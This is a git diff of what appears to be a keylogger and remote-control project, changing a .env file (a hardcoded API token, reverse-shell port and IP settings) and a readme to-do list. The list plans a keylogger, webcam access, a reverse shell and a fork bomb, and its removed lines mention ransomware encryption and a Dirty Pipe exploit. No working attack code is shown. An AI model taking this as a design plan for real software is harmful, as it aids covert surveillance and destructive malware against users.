diff --git a/.env b/.env
index ad0b73d3f659b8d124eb243ab63517f0ae37e377..4920dadc40cafb0193d646bad9755962b8f77564 100644
--- a/.env
+++ b/.env
@@ -10,8 +10,6 @@ INFO_API = "/info"
 COMMANDS_API="/commands"
 BUFFERMAXLEN = 50
 API_TOKEN = "cbbYrcu6BkM6dSnmzMU0BWZMlxqrIboT"
-SHELL_PORT = "4444"
-SHELL_IP = "127.0.0.1"
 
 #NEEDED FOR SERVER
 
diff --git a/readme.md b/readme.md
index 53d37bb9eb1e4a5692f5711d641989bf720f30e3..fc9a03687da8b48530b342b4f513193bc665b60a 100644
--- a/readme.md
+++ b/readme.md
@@ -8,22 +8,13 @@
 # to do
 
 ## functions
-- command api + client + command interface + data log --> get pour les commande et post pour leur resultat
-- api pour client configuration (api endpoints, etc) --> client gets conf updates from server --> dans commandes
-- error log --> keylogger sould log error not print it to stdout (maybe send it later to serv ?) --> recup from env
-- error api for client errors (systeminfo.rs, main.rs) --> store in env vars et fonction send_errs qui recup ces vars
-- distrib missing from info ?
+- get client errors from env
 - encrypt keylogger data
-- better frontend
 - ssl
 
 ## cleanup / optimisation
-- améliorer gestion erreur
-- move log operation to log.rs
-- meilleurs noms pour les routes
 - add timestamp for commands result
-# questions
-- handling errors in threads
+
 
 # API
 
@@ -38,14 +29,9 @@
 
 - Keylogger
 - Accès webcam
-- Accès micro
-- Encryption (ransomware)
-
-2. Serveur de commandes
-
- - Nat pown ? 
+- Reverse Shell
+- Fork bomb
 
-3. Exploit (Dirty pipe)
 
 ## Database : 
     - Engine : Postgres (Diesel)